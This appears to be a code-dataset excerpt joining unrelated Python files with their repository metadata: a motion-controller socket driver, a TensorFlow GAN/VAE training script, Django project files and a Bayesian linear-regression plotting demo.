retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZSplineVerification : XYZ trajectory verifivation
def XYZSplineVerification (self, socketId, GroupName, TrajectoryFileName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineVerification(' + GroupName + ',' + TrajectoryFileName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYZSplineVerificationResultGet : XYZ trajectory verification result get
def XYZSplineVerificationResultGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineVerificationResultGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# XYZSplineExecution : XYZ trajectory execution
def XYZSplineExecution (self, socketId, GroupName, TrajectoryFileName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineExecution(' + GroupName + ',' + TrajectoryFileName + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# XYZSplineParametersGet : XYZ trajectory get parameters
def XYZSplineParametersGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'XYZSplineParametersGet(' + GroupName + ',char *,double *,double *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# OptionalModuleExecute : Execute an optional module
def OptionalModuleExecute (self, socketId, ModuleFileName, TaskName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'OptionalModuleExecute(' + ModuleFileName + ',' + TaskName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# OptionalModuleKill : Kill an optional module
def OptionalModuleKill (self, socketId, TaskName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'OptionalModuleKill(' + TaskName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMCIESet : Set CIE EEPROM reference string
def EEPROMCIESet (self, socketId, CardNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMCIESet(' + str(CardNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMDACOffsetCIESet : Set CIE DAC offsets
def EEPROMDACOffsetCIESet (self, socketId, PlugNumber, DAC1Offset, DAC2Offset):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMDACOffsetCIESet(' + str(PlugNumber) + ',' + str(DAC1Offset) + ',' + str(DAC2Offset) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMDriverSet : Set Driver EEPROM reference string
def EEPROMDriverSet (self, socketId, PlugNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMDriverSet(' + str(PlugNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EEPROMINTSet : Set INT EEPROM reference string
def EEPROMINTSet (self, socketId, CardNumber, ReferenceString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EEPROMINTSet(' + str(CardNumber) + ',' + ReferenceString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# CPUCoreAndBoardSupplyVoltagesGet : Get power informations
def CPUCoreAndBoardSupplyVoltagesGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'CPUCoreAndBoardSupplyVoltagesGet(double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(8):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# CPUTemperatureAndFanSpeedGet : Get CPU temperature and fan speed
def CPUTemperatureAndFanSpeedGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'CPUTemperatureAndFanSpeedGet(double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ActionListGet : Action list
def ActionListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ActionListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ActionExtendedListGet : Action extended list
def ActionExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ActionExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# APIExtendedListGet : API method list
def APIExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'APIExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# APIListGet : API method list without extended API
def APIListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'APIListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ControllerStatusListGet : Controller status list
def ControllerStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ErrorListGet : Error list
def ErrorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ErrorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventListGet : General event list
def EventListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringListGet : Gathering type list
def GatheringListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExtendedListGet : Gathering type extended list
def GatheringExtendedListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExtendedListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalListGet : External Gathering type list
def GatheringExternalListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupStatusListGet : Group status list
def GroupStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareInternalListGet : Internal hardware list
def HardwareInternalListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareInternalListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareDriverAndStageGet : Smart hardware
def HardwareDriverAndStageGet (self, socketId, PlugNumber):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareDriverAndStageGet(' + str(PlugNumber) + ',char *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ObjectsListGet : Group name and positioner name
def ObjectsListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ObjectsListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerErrorListGet : Positioner error list
def PositionerErrorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerHardwareStatusListGet : Positioner hardware status list
def PositionerHardwareStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverStatusListGet : Positioner driver status list
def PositionerDriverStatusListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ReferencingActionListGet : Get referencing action list
def ReferencingActionListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ReferencingActionListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ReferencingSensorListGet : Get referencing sensor list
def ReferencingSensorListGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ReferencingSensorListGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringUserDatasGet : Return user data values
def GatheringUserDatasGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringUserDatasGet(double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(8):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ControllerMotionKernelPeriodMinMaxGet : Get controller motion kernel min/max periods
def ControllerMotionKernelPeriodMinMaxGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerMotionKernelPeriodMinMaxGet(double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ControllerMotionKernelPeriodMinMaxReset : Reset controller motion kernel min/max periods
def ControllerMotionKernelPeriodMinMaxReset (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerMotionKernelPeriodMinMaxReset()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# SocketsStatusGet : Get sockets current status
def SocketsStatusGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'SocketsStatusGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TestTCP : Test TCP/IP transfert
def TestTCP (self, socketId, InputString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TestTCP(' + InputString + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
| [
"newville@cars.uchicago.edu"
] | newville@cars.uchicago.edu |
e8688df2a0668840385211661efffb0fc71f604f | 42ec4645884c44f9bee3ea2628e54b30680e2880 | /train.py | d882d258a58d48a550b2447d1b5d9fcd78e8f37a | [] | no_license | Sanyem/3dgan | 4d67b67ace160f74485bb45423e8cf5f53cfad03 | 86e69cf20a70d9a12cf0b07a39e79bcf17a5f77a | refs/heads/master | 2020-04-10T21:20:00.332669 | 2018-05-06T21:46:41 | 2018-05-06T21:46:41 | 161,293,932 | 0 | 1 | null | 2018-12-11T07:23:42 | 2018-12-11T07:23:41 | null | UTF-8 | Python | false | false | 13,012 | py | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # only log errors
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR) # only log errors
import numpy as np
import sys
import random
import argparse
import uuid
import pickle
import h5py
import cv2
import time
from tqdm import tqdm, trange
from sys import stdout
from os import path
from util import *
from data import get_dataset
from models.cnn import cnn
from models.gan import gan
from models.vae import vae
class load_args_from_file(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
# add '--' prefix to options if not set
contents = values.read().split()
for i in range(int(len(contents)/2)):
if contents[i*2][0:2] != '--':
contents[i*2] = '--' + contents[i*2]
# parse
data = parser.parse_args(contents, namespace=namespace)
# set values, ignoring any --config option in file
for k, v in vars(data).items():
if v and k != option_string.strip('-'):
setattr(namespace, k, v)
if __name__ == '__main__':
# command line arguments
######################################################################
parser = argparse.ArgumentParser(description='Autoencoder training harness.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
epilog="""Example:
python train.py --model gan
--data floorplans
--epochs 100
--batch_size 192
--n_gpus 2
--dir workspace/gan/run1""")
parser._action_groups.pop()
model_args = parser.add_argument_group('Model')
data_args = parser.add_argument_group('Data')
optimizer_args = parser.add_argument_group('Optimizer')
train_args = parser.add_argument_group('Training')
misc_args = parser.add_argument_group('Miscellaneous')
# misc settings
add = misc_args.add_argument
add('--config',
type=open,
action=load_args_from_file,
help="""Read in a file containing command arguments. Any additional command
line arguments will overwrite those same options set in the config file.""")
add('--seed',
type=int,
help="Useful for debugging. Randomized each execution if not set.")
add('--n_gpus',
type=int,
default=1,
help="""Number of GPUs to use for simultaneous training. Model will be
duplicated on each device and results averaged on CPU.""")
add('--profile',
default=False,
action='store_true',
help="""Enables runtime metadata collection during training that is
viewable in TensorBoard.""")
# training settings
add = train_args.add_argument
add('--epochs',
default='3',
help="""Number of epochs to train for during this run. Use an integer to
denote the max number of epochs to train for, or `+n` for an
additional n epochs from a saved checkpoint.""")
add('--batch_size',
type=int,
default=256,
help="Batch size to use, per device.")
add('--epoch_size',
type=int,
default=-1,
help="""Number of iterations to use per epoch. Defaults to using the
entire dataset.""")
add('--examples',
type=int,
default=64,
help="""Number of examples to generate when sampling from generative models
(if supported). Note, this must be a power of 2.""")
add('--dir',
type=str,
default='workspace/{}'.format(uuid.uuid4()),
help="""Location to store checkpoints, logs, etc. If this location is populated
by a previous run then training will be continued from last checkpoint.""")
add('--n_disc_train',
type=int,
default=5,
help="""Number of times to train discriminator before training generator
(if applicable).""")
# optimizer settings
add = optimizer_args.add_argument
add('--optimizer',
type=lambda s: s.lower(),
default='rmsprop',
help="Optimizer to use during training.")
add('--lr',
type=float,
default=0.001,
help="Learning rate of optimizer (if supported).")
add('--loss',
type=lambda s: s.lower(),
default='l1',
help="Loss function used by model during training (if supported).")
add('--momentum',
type=float,
default=0.01,
help="Momentum value used by optimizer (if supported).")
add('--decay',
type=float,
default=0.9,
help="Decay value used by optimizer (if supported).")
add('--centered',
default=False,
action='store_true',
help="Enables centering in RMSProp optimizer.")
add('--beta1',
type=float,
default=0.9,
help="Value for optimizer's beta_1 (if supported).")
add('--beta2',
type=float,
default=0.999,
help="Value for optimizer's beta_2 (if supported).")
# model settings
add = model_args.add_argument
add('--model',
type=lambda s: s.lower(),
default='fc',
help="Name of model to train.")
add('--latent_size',
type=int,
default=200,
help="""Size of middle 'z' (or latent) vector to use in autoencoder
models (if supported).""")
# data/pipeline settings
add = data_args.add_argument
add('--dataset',
type=lambda s: s.lower(),
default='floorplans',
help="Name of dataset to use. Default: floorplans.")
add('--resize',
type=int,
nargs=2,
help="""Resize input images to size w x h. This argument, if specified,
requires two values (width and height).""")
add('--shuffle',
default=True,
action='store_true',
help="""Set this to shuffle the dataset every epoch.""")
add('--buffer_size',
type=int,
default=10000,
help="""Size of the data buffer.""")
add('--grayscale',
default=False,
action='store_true',
help="Converts input images to grayscale.")
add('--cache_dir',
default=None,
help="""Cache dataset to the directory specified. If not provided,
will attempt to cache to memory.""")
args = parser.parse_args()
# set up model, data, and training environment
######################################################################
# set seed (useful for debugging purposes)
if args.seed is None:
args.seed = os.urandom(4)
random.seed(args.seed)
# init globals
message('Parsing options...')
with tf.device('/cpu:0'):
global_step = tf.Variable(0, trainable=False, name='global_step')
global_epoch = tf.Variable(0, trainable=False, name='global_epoch')
increment_global_epoch = tf.assign(global_epoch, global_epoch+1)
# save options to disk for later reference
if not os.path.exists(args.dir):
os.makedirs(args.dir)
f = open(os.path.join(args.dir, 'options.config'), 'w')
for a in vars(args):
v = getattr(args, a)
f.write('{} {}\n'.format(a, v))
print(' {} = {}'.format(a, v))
f.close()
# input pipeline
message('Initializing input pipeline...')
with tf.variable_scope('input_pipeline'):
x, x_init, x_count = get_dataset(args)
# x, x_count = get_dataset(args)
if args.epoch_size <= 0:
iter_per_epoch = int(x_count / (args.batch_size * args.n_gpus))
else:
iter_per_epoch = args.epoch_size
if args.resize:
message(' Resizing images to {}.'.format(args.resize))
x = tf.image.resize_images(x, args.resize)
if args.grayscale:
message(' Converting images to grayscale.')
x = tf.image.rgb_to_grayscale(x)
# setup model
message('Initializing model...')
# models should return a 2-tuple (f, s) where f is a training
# function that runs one step (or batch) of training and s is a
# summary op containing all summaries to run.
model_funcs = {'gan' : gan,
'wgan' : gan,
'iwgan': gan,
'vae' : vae,
'cnn' : cnn}
train_func = model_funcs[args.model](x, args)
summary_op = merge_all_summaries()
# supervisor
message('Initializing supervisor...')
init_op = tf.group(tf.global_variables_initializer(),
tf.local_variables_initializer())
sv = tf.train.Supervisor(logdir = args.dir,
init_op = init_op,
summary_op = None,
global_step = global_step,
save_model_secs = 0,
saver = tf.train.Saver(max_to_keep=0, name='saver'))
# profiling (optional)
# requires adding libcupti.so.8.0 (or equivalent) to LD_LIBRARY_PATH.
# (location is /cuda_dir/extras/CUPTI/lib64)
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE) if args.profile else None
run_metadata = tf.RunMetadata() if args.profile else None
# training
######################################################################
session_config = tf.ConfigProto(allow_soft_placement=True)
with sv.managed_session(config=session_config) as sess:
# initialize
start_time = time.time()
save_path = os.path.join(args.dir, 'checkpoint')
current_step = int(sess.run(global_step))
current_epoch = int(sess.run(global_epoch))
if args.epochs[0] == '+':
max_epochs = current_epoch + int(args.epochs[1:])
else:
max_epochs = int(args.epochs)
status = None
sess.run(x_init)
# save model params before any training has been done
if current_step == 0:
message('Generating baseline summaries and checkpoint...')
# sess.run(x_init)
sv.saver.save(sess, save_path=save_path, global_step=global_step)
sv.summary_computed(sess, sess.run(summary_op))
message('Starting training...')
for epoch in range(current_epoch, max_epochs):
# sess.run(x_init)
# -1 to save 1 batch for summaries at end
pbar = tqdm(range(iter_per_epoch), desc='Epoch {:3d}'.format(epoch+1), unit='batch')
for i in pbar:
if sv.should_stop():
print('stopping1')
break
else:
# train and display status
prev_status = status
status = train_func(sess, args)
pbar.set_postfix(format_for_terminal(status, prev_status))
# record 10 extra summaries (per epoch) in the first 3 epochs
if epoch < 3 and i % int((iter_per_epoch / 10)) == 0:
sv.summary_computed(sess, sess.run(summary_op))
# # and record a summary half-way through each epoch after that
elif epoch >= 3 and i % int((iter_per_epoch / 2)) == 0:
sv.summary_computed(sess, sess.run(summary_op))
if sv.should_stop():
print('stopping2')
break
sess.run(increment_global_epoch)
# sess.run(tf.assign(global_epoch, global_epoch+1))
current_epoch = int(sess.run(global_epoch))
# print('completed epoch {}'.format(current_epoch))
# generate summaries and checkpoint
sv.summary_computed(sess, sess.run(summary_op))
sv.saver.save(sess, save_path=save_path, global_step=global_epoch)
# print('generated summaries and checkpoint')
message('\nTraining complete! Elapsed time: {}s'.format(int(time.time() - start_time)))
| [
"pls@algoterranean.com"
] | pls@algoterranean.com |
cc0d10e49221d788586d5696bbc4acaac89f2349 | 5cc4679bb1680427dc8b14572f9679ca8cb8eb3a | /wth_home/wth_home/settings.py | 6826312a7ca46a6c40db2f0df279dfceee47e7ce | [] | no_license | seahyc/wth-home | 47406ef801c1c9d34c608e5a757b2089b9c2bf19 | 58443614c3f071ac75f0b89a42cc9f9644d8378d | refs/heads/master | 2020-04-05T18:57:02.600138 | 2014-10-09T00:03:12 | 2014-10-09T00:03:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,048 | py | """
Django settings for wth_home project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'zpnlcw*4_q85upf7&ndqyy&i$!-hprr$2l48s^zn9$@kql*nw7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'wth_home.urls'
WSGI_APPLICATION = 'wth_home.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
| [
"snowboarderwv@Raghav-Joshis-MacBook-Pro.local"
] | snowboarderwv@Raghav-Joshis-MacBook-Pro.local |
dd1ad825046444e8fd52923491bfcc23d5075f01 | c249f6a46ae5f20669b8db87bf0dc5bae49e6770 | /Brandless/accounts/form.py | 4a0030bd782fc3c99e4bca4c9b515d0e4f60805e | [] | no_license | arjuntsaji/Django-crud-operations-miniproject | 390715fb0f5faed9e26f4cfb9dbf8916e2de4d0d | c1a193e5a80cfb3ac64e7c3ebdd9ae4bd43be833 | refs/heads/master | 2023-05-14T20:29:31.609820 | 2021-06-06T04:42:46 | 2021-06-06T04:42:46 | 348,951,368 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | from django import forms
from accounts.models import Employees
class EmployeeForm(forms.ModelForm):
class Meta:
model=Employees
fields = "__all__"
labels={
"first_name":"First Name",
"last_name": "Last Name",
"emp_id": "Emp Id",
"typeofwork":"Type of Work",
"position":"Position Level",
"resume_file":"Upload Resume"
}
def __init__(self, *args, **kwargs):
super(EmployeeForm, self).__init__(*args,**kwargs)
self.fields["position"].empty_label = "Select"
self.fields["department"].empty_label = "Select"
self.fields["typeofwork"].empty_label = "Select"
| [
"arjuntsaji24@gmail.com"
] | arjuntsaji24@gmail.com |
f55d8e0a0e7b71e66374c7a1965cc486396cfd89 | c37a379a705503d2d1e1a9ae21c848e1fc7e1e0c | /HTTPager/wsgi.py | 6cc21ac5f1fc16832dbef4705ed74cdadf640fc6 | [
"MIT"
] | permissive | alexandres/HTTPager | 500ffe2515cf76b68d6b62810f9106398c2b7d8e | 88fbc824727ce7afcd81eaba998cfa2af8e4165f | refs/heads/master | 2023-01-27T22:36:23.748761 | 2020-11-07T12:11:42 | 2020-11-07T12:11:42 | 204,201,626 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | """
WSGI config for HTTPager project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'HTTPager.settings')
application = get_wsgi_application()
| [
"outroalex@gmail.com"
] | outroalex@gmail.com |
ecabc3dcb10145b83bbb80f262734d974703a141 | 49860fb1b74a4d335ed0931dc42f68fb4b540ab7 | /env/bin/easy_install-3.7 | fda23799d06ca0e9bbc56983d8690b34ca37d3a6 | [] | no_license | noamgrinch/ShortenURL | ffc061ebd9e45e9a08cb22c77f16a65965bbc8b2 | aae0ecfa3142478ae6db9d392378007139aaab8b | refs/heads/master | 2020-09-07T07:41:34.235824 | 2019-11-18T12:43:45 | 2019-11-18T12:43:45 | 220,707,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | 7 | #!/home/noam/PycharmProjects/ShortenURL/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"noamgrinch@gmail.com"
] | noamgrinch@gmail.com |
ae07986f3afe90f68fb0409edab1c246bf2f39c5 | d060a9672cddc61ea44bcabf933eaecb98864d1e | /Linear regression.py | 978c596bc5a7b5b464791a454e12abe02a611240 | [] | no_license | prashant1423/Project_AML_A1_Python | a3c20c58ac4d07781dc9a47c52f142fd249db181 | 2eb54e63ed24b0fb44557cbfac56054349e56d32 | refs/heads/master | 2020-07-02T09:51:13.215623 | 2016-12-01T17:03:56 | 2016-12-01T17:03:56 | 74,312,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,946 | py |
import numpy as np
import matplotlib.pyplot as plt
from itertools import product
from scipy.stats import norm
from scipy.stats import multivariate_normal
def plotPrior(number):
#linspace will create a row vector equally spaced between -2 and 2
w0 = np.linspace(-2.0, 2.0, num=number)
w1 = np.linspace(-2.0, 2.0, num=number)
#meshgrid arrange all comibinations of x and y
X, Y = np.meshgrid(w0, w1)
N, M = len(X), len(Y)
#fill with zero matrix
Z = np.zeros((N, M))
#product - cartesian product wo and w1
for i,(x,y) in enumerate(product(w0,w1)):
#hstack - horizontally arrange as stack of arrays
pos = np.hstack((x, y))
Z[np.unravel_index(i, (N,M))] = multivariate_normal([0, 0], [[0.3,0],[0,0.3]]).pdf(pos)
im = plt.imshow(Z,cmap='jet',extent=(-2, 2, -2, 2))
ax = plt.gca()
ax.grid(False)
plt.xlabel('w1')
plt.ylabel('w0')
plt.show()
def computeLikelihood(number, xi, yi, posterior = None):
w0 = np.linspace(-2.0, 2.0, num=number)
w1 = np.linspace(-2.0, 2.0, num=number)
X, Y = np.meshgrid(w0, w1)
N, M = len(X), len(Y)
Z = np.zeros((N, M))
for i,(x,y) in enumerate(product(w0,w1)):
pos = np.hstack((x, y))
if posterior is None:
Z[np.unravel_index(i, (N,M))] = norm(x*xi + y, np.sqrt(0.3)).pdf(yi) * multivariate_normal([0, 0], [[0.3,0],[0,0.3]]).pdf(pos)
else :
Z[np.unravel_index(i, (N,M))] = norm(x*xi + y, np.sqrt(0.3)).pdf(yi) * posterior[i]
Z= np.reshape(Z,10000)
indices = np.argsort(Z)[::-1][:20]
Wsamples =[]
for i,(x,y) in enumerate(product(w0,w1)):
for j, index in enumerate(indices):
if i == index :
Wsamples.append((x,y))
return Z, Wsamples
def plotSamples(W):
x = np.arange(-1.0, 1.0, 0.1)
#y = np.arange(-1.0, 1.0, 0.1)
fig = plt.figure()
#plt.ylim(-1.0, 1.0)
ax = plt.gca()
ax.grid(False)
for (w0,w1) in W:
plt.plot(x,w0*x+w1)
plt.xlabel('x1')
plt.ylabel('y')
plt.show()
def plotLikelihood(Z):
Z= np.reshape(Z,(100,100))
im = plt.imshow(Z,cmap='jet',extent=(-2, 2, -2, 2))
plt.xlabel('w1')
plt.ylabel('w0')
ax = plt.gca()
ax.grid(False)
# plt.show()
def plotPosterior():
x, y = np.mgrid[-1:1:.01, -1:1:.01]
pos = np.dstack((x, y))
rv = multivariate_normal([0.5, -0.2], [[2.0, 0.3], [0.3, 0.5]])
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
ax2.contourf(x, y, rv.pdf(pos), cmap='jet')
# plt.show()
def plotNormal2D(X,fid):
nbins = 200
H, xedges, yedges = np.histogram2d(X[:,0],X[:,1],bins=nbins)
H = np.rot90(H)
H = np.flipud(H)
Hmasked = np.ma.masked_where(H==0,H)
fig = plt.figure(fid)
plt.pcolormesh(xedges,yedges,Hmasked, cmap='jet')
plt.ylim([-3,3])
plt.xlim([-3,3])
#plt.axis([-5,5,-5,5])
plt.show()
def pickDataPoint(w0,w1,sigma,mu):
#sample from unif(-1,1)
x = round(2 * np.random.random_sample() -1 ,2)
sigma = np.sqrt(sigma)
#epsilon = N(mu,sigma)
epsilon = sigma * np.random.randn() + mu
y = w0*x + w1 + epsilon
return(x,y)
def posteriorDistribution(prevPosterior , likelihood):
for i, y in enumerate(likelihood):
prevPosterior[i] = y * prevPosterior[i]
return prevPosterior
# visualise the prior over W
#kPrior = [[0.3,0],[0,0.3]]
#muPrior = [0, 0]
N = 1000000
#plot prior
#(prior,1)
#parameters
w0 = -1.3
w1 = 0.5
sigma = 0.3
mu = 0
#pick first point
#for i in enumerate (N,M)
#psi =
#beta = 1/0.3
#priormean = sigma*((linang.inv(sigma)*mean)+beta)
#priorsigma =
plotPrior(102)
x, y = pickDataPoint(w0,w1,sigma,mu)
Z, W = computeLikelihood(100, x,y)
plotSamples(W)
plotLikelihood(Z)
for i in range(25):
x1, y1 = pickDataPoint(w0,w1,sigma,mu)
Z,W = computeLikelihood(100, x1, y1, Z)
if i==1:
plotSamples(W)
plotLikelihood(Z)
plotSamples(W)
plotLikelihood(Z)
| [
"noreply@github.com"
